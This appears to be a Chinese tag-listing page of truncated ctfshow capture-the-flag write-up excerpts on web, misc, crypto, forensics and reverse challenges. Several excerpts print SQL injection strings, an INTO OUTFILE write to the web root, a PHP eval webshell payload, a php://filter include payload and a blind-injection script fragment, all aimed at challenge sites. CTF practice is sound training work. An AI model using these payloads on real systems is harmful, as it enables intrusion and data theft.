首页 > TAG信息列表 > ctfshow
CTFSHOW Web266
highlight_file(__FILE__); include('flag.php');$cs = file_get_contents('php://input'); class ctfshow{ public $username='xxxxxx'; public $password='xxxxxx'; public function __construct($u,$p){ $this-&gctfshow 萌新web系列--3
<html> <head> <title>ctf.show萌新计划web1</title> <meta charset="utf-8"> </head> <body> <?php # 包含数据库连接文件 include("config.php"); # 判断get提交的参数id是否存在 if(isset($_GET['id'])){ctfshow 萌新web系列--2
<html> <head> <title>ctf.show萌新计划web1</title> <meta charset="utf-8"> </head> <body> <?php # 包含数据库连接文件 include("config.php"); # 判断get提交的参数id是否存在 if(isset($_GET['id'])){ctfshow 摆烂杯 取证部分
JiaJia-CP-1 点击查看代码 1.佳佳的电脑用户名叫什么(即C:\Users{name}) 2.最后一次运行计算器的时间?(格式为yyyy-mm-dd_hh:mm:ss,注意冒号为英文冒号) 先查看一波镜像版本 volatility -f JiaJia_Co.raw imageinfo 然后按提示说的filescan Users volatility -f JiaJia_Co.rawctfshow—文件包含
参考 PHP伪协议总结 - SegmentFault 思否 WEB78 无防护读取源码 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 伪协议读取后base64解密 payload:?file=php://filtCTF刷题网站
攻防世界 CTF Hub Bugku CTF BMZ CTF CTFshow WP CTF工具下载 <p><a href="https://adworld.xctf.org.cn/home/index"><strong>攻防世界</strong></a></p> <p><a href="https://www.ctfhub.com/#/index"><stro【CTFshow】Web入门-php特性(104-113)wp
Web104(Hash函数) 你有没有发现,这里没有要求v1和v2不相等...... Web105(变量覆盖,$$可变变量) 这里涉及到两个美元符\$\$,这种变量叫可变变量,最直观的理解: 输出结果是world,\$\$a就相当于是\$(\$a)=\$hello。 我们可以发现要想输出最终的flag变量,要满足两个foreach和一个if,先看一下这misc刷题记录
ctfshow单身杯 misc签到 一个加密的zip,直接爆破密码,得到一个png 用010打开图片,在末尾找到了base64密文,解码后发现是二维码 用stegsolve的red 0通道找到前一部分flag 补全反色二维码,扫出十六进制密文 解码得到后半部分flag 得到ctfshow{Yourctfshow的一些wp
1. ctfshow 击剑杯 esaypop(反序列化构造pop链) 题目地址:https://ctf.show/challenges 题目源码: highlight_file (FILE); 点击查看代码 highlight_file (__FILE__); error_reporting(0); class action_1{ public $tmp; public $fun = 'system'; public function __cactfshow-萌新赛-MISC记录
1.千字文 1.010打开,发现png头,得到一张二维码 2.QR扫描,没有有用信息 3.用Stegsolve查看,发现一张图片,基本思路就是切割然后批量扫描 4.Stegsolve中save as保存下来,脚本切割白边 from PIL import Image img=Image.open('solved.bmp') box=(50,50,675,675) im_crop=img.crop(box) i【ctfshow】摆烂杯web wp
Web签到 让我直接算?不可能的。先查一波,发现了这个。。。 幸亏没算。算不了那怎么办呢,看看能不能输入一些不合法的数: 看来还能输入表达式,既然如此,那就输入1/3次幂试试: 成功拿到flag。 一行代码 好家伙,实际中谁这么写代码直接被爆锤,整理一下代码如下: 一个三目运算符,也就是需要SQL注入 进阶绕过技巧
hex/哈希值绕过 1' union select hex(id),hex(username),hex(password) from ctfshow_web.ctfshow_user3--+ 如果回显点少的话,可以在后面加上limit 3,5# 即表示,从第三列数据开始输出五列 base64加密绕过 1' union select 1,to_base64(username),to_base64(password) from ctfs[ctfshow]Web4
Web4 题目描述 无 题目解析 打开页面发现和web3的内容一样,测试发现可以完全用web3通关,这里放一下web3的链接,就不再重写一遍了。 https://www.cnblogs.com/alm0st/p/16403078.html[ctfshow]Web2
Web2 题目描述 最简单的SQL注入 题目解析 打开页面发现有一个表单,根据题目的描述可以确定,这是一个SQL注入题目。手动填写数据包进行发送一次,用burp suite抓取数据包。 构造SQL注入语句,这是一个登录功能,那应该考虑是字符串注入,在username后面加上 ' or 1=1 #发送 成功登录。证[ctfshow]Web签到题
Web签到题 题目描述 无 题目解析 题目非常的简单,只有一行文字:where is flag?我们直接右键查看源代码,发现有一行被注释掉的内容 看着像是被编码过的内容,尝试用Base64解码,Nice~ctfshow web入门xxe
xxe XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 参考链接 xxe漏洞学习 --时光不改 web373 <?php /* # -*- coding: utf-8 -*- # @ACTFSHOW信息搜集
WEB1 根据提示:代码注释未删除,可能存在于前端代码或者后端代码。 因为是基础题,所以F12即可看到前端HTML页面存在注释flag。 WEB2 根据提示:js限前台拦截,打开页面,按例打开F12,结果发现打开不了,即js拦截了F12。 1、抓包工具查看 2、提前打开F12 WEB3 提示抓包查看信息,发现response头ctf_show-web入门-其他-(406-422)
406 http://www.baidu.com;'union/**/select/**/1,(select/**/flag/**/from/**/flag)/**/into/**/outfile/**/"/var/www/html/flag.txt"%23 407 ?ip=cafe::add ip6地址,类的名字叫cafe都是16进制 408 ?email="<?php eval($_POST[1]);?>"ctfshow-大赛原题(680-685)
web680 post传入code=phpinfo();有回显 查看disable_functions,发现这些被禁用 assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstoped,pcntl_wifsignaled,pcntl_wexitstatus,pcnCTFshow——funnyrsa1的wp理解
题目如下: 题目分析: 拿到题,发现给的e不常规,p1和p2相等,有两个不同n,两个不同c和两个不同e。给定两个密文的情况下,通常需要找到两者之间存在的关系,“合并”密文求解才能得到正确的明文。先计算phi1和phi2,然后分别计算e和phi的gcd,发现都等于14,所以这里问题考察e和phi不互素情况CTFSHOW-Reverse-刷题记录
re2 打开初步分析为32位程序,无壳,拖入IDA32分析 找到关键行47-50,分析得出各函数内部的基本作用如图所示 首先进入分析输入后的处理 可以很明显看出,是对输入的字符串进行处理后再操作,因此根据这个思路写出脚本,得到这里的密钥 #!/usr/bin/python #coding=utf-8 user = "DH~mqqvqxB^SQL注入-2
简单盲注 import requests import time result = "" url = 'http://986b6ffa-086c-4650-8237-9557e9bd100c.challenge.ctf.show/api/' for i in range(80): min_num = 32 max_num = 127 while True: mid_num = (min_num + max_num) >ctfshow web入门反序列化
先来点知识点 序列化和反序列化的概念: 序列化就是将对象转换成字符串。字符串包括 属性名 属性值 属性类型和该对象对应的类名。 反序列化则相反将字符串重新恢复成对象。 对象的序列化利于对象的保存和传输,也可以让多个文件共享对象。 serialize() (序列化)返回字符串,此字符串包含ctfshow web入门(持续更新
ctfshow web入门 前言一、信息收集 web2二、信息收集 web3三、信息收集 web4四、信息收集 web5 前言 由于太菜了,所以最近要多做点题 一、信息收集 web2 题目: 题目提示js前台拦截,可以想到用Burp Suite抓包,然后重发即可得到flag: 二、信息收集 web3 题目: 题目提示抓个包ctfshow web由一道题的思路实现通杀
ctfshow萌新计划 根据web1的几个解法思路我实现了对后面几道题的通杀,仔细想想感觉对于我这样的新手来说这几题还不错 题目一:web1 代码很安全,没有漏洞 打开题目很显然这一题考察的是代码审计,我们把代码粘贴下来审计一波 <html> <head> <title>ctf.show萌新计划web1</title>